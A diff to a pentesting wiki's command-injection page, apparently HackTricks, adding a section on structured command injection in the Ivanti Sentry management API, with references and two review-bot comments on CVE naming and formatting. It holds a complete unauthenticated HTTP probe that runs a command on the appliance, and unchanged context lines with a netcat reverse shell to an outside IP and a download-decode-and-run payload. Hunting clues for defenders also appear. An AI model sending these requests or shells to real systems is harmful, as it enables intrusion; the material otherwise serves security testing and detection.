51 changes: 51 additions & 0 deletions src/pentesting-web/command-injection.md
Expand Up @@ -67,6 +67,54 @@ vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
```

### Structured configuration-command injection in appliance APIs (Ivanti Sentry)

Some appliance management planes do **not** pass attacker input straight into `/bin/sh`. Instead, they expose an HTTP endpoint that accepts what looks like a normal form field, but the backend parses it as a **trusted internal configuration command**.

**Pattern seen in Ivanti Sentry:**

- Unauthenticated POST endpoint: `/mics/api/v2/sentry/mics-config/handleMessage`
- User-controlled form field: `message`
- Backend tokenizes `message` into an internal verb / module / XPath / XML body
- The `execute system /configuration/system/commandexec` path reaches the native command-execution feature
- The command itself lives inside the XML-like `reqandres` field, so this is **structured command injection**, not just `;id`-style shell metacharacter abuse

Minimal probe:

```http
POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

message=execute+system+%2Fconfiguration%2Fsystem%2Fcommandexec+%3Ccommandexec%3E%3Cindex%3E1%3C%2Findex%3E%3Creqandres%3Eid%3C%2Freqandres%3E%3C%2Fcommandexec%3E
```

Decoded shape:

```
message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>
```

What makes this interesting during review:

1. **Verb-based dispatch**: user input is split into tokens such as `execute`, `system`, and an internal configuration path.
2. **Structured body parsing**: the trailing data is parsed as XML/config rather than treated as a plain argument.
3. **Privileged backend bridge**: the request reaches native/admin functionality intended for trusted internal workflows.
4. **No classic metacharacters required**: if filters only block `;`, `&&`, `|`, or `$()`, the bug still works because the payload is syntactically valid for the appliance's own parser.

Testing ideas for similar products:

- Enumerate **unauthenticated or weakly protected management/config endpoints** that accept verbs, config paths, XML fragments, or CLI-like mini languages.
- Diff patched builds for hardcoded replacement payloads or newly blocked paths; they often reveal the exact internal command grammar.
- Try legitimate-looking verbs such as `execute`, `test`, `import`, `query`, `apply`, `run`, or `diagnose` instead of shell separators.
- If the response returns structured XML/JSON, check whether your command output is embedded inside success fields rather than echoed raw.

Hunting clues:

- POSTs to `/mics/api/v2/sentry/mics-config/handleMessage`
- `Content-Type: application/x-www-form-urlencoded` with `message=`
- Tokens such as `execute system`, `/configuration/system/commandexec`, `<commandexec>`, `<reqandres>`

### Bash arithmetic evaluation in RewriteMap/CGI-style scripts

RewriteMap helpers written in **bash** sometimes push query params into globals and later compare them in **arithmetic contexts** (`[[ $a -gt $b ]]`, `$((...))`, `let`). Arithmetic expansion re-tokenizes the content, so attacker-controlled variable names or array references are expanded twice and can execute.
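Review bot: the new Ivanti Sentry section (from the `### Structured configuration-command injection in appliance APIs (Ivanti Sentry)` heading through the hunting clues) never names the CVE it documents and gives no success indicator for the minimal probe, so a reader cannot tell which advisory applies or whether the request actually worked. The references added in this same change attribute the pre-auth command execution to CVE-2026-10520 (the watchTowr entry), so put that identifier in the heading or in the first bullet of the "Pattern seen in Ivanti Sentry" list, and after the "Decoded shape" block state what a successful response to `<reqandres>id</reqandres>` looks like; the later bullet "check whether your command output is embedded inside success fields rather than echoed raw" implies the output is in the response body, but the probe section should say where to look. Two smaller points: the raw request has no `Content-Length` header, so it is not copy-pasteable as an HTTP/1.1 POST, and the "Decoded shape" fence has no language tag while the probe fence is tagged `http`.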
Expand Down Expand Up @@ -287,5 +335,8 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
- [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html)
- [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
- [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/)
- [Rapid7 – CVE-2026-10520, CVE-2026-10523 - Multiple critical vulnerabilities affecting Ivanti Sentry](https://www.rapid7.com/blog/post/etr-cve-2026-10520-cve-2026-10523-multiple-critical-vulnerabilities-affecting-ivanti-sentry)
- [watchTowr Labs – Ivanti Sentry Pre-Auth OS Command Injection (CVE-2026-10520)](https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/)
- [Ivanti advisory – Ivanti Sentry (CVE-2026-10520 / CVE-2026-10523)](https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US)

{{#include ../banners/hacktricks-training.md}}
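Review bot: the three new reference entries are inconsistent with the existing list style and with each other: the Rapid7 title uses a plain hyphen (`CVE-2026-10523 - Multiple critical vulnerabilities`) where the other entries use an en dash after the source name, and the vendor advisory sits last although it is the authoritative source for affected and fixed versions. Suggest normalizing all three to the `- [Source – Title](url)` form used by the existing Unit 42 entry and moving the Ivanti advisory above the third-party write-ups. Also, the list now cites both CVE-2026-10520 and CVE-2026-10523 while the section added earlier in this diff documents only the `handleMessage` endpoint, so mark in the entry (or in the section) which of the two CVEs that endpoint corresponds to.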